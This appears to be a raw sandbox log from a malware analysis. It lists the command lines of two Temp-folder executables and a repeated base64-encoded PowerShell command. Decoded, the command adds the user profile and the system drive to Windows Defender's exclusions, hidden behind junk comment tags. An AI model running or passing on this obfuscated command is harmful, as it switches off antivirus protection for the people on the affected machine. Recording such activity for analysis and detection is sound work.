"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "171520143456164269197818441-19360905231759698437-130725631791066761-442870599"
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
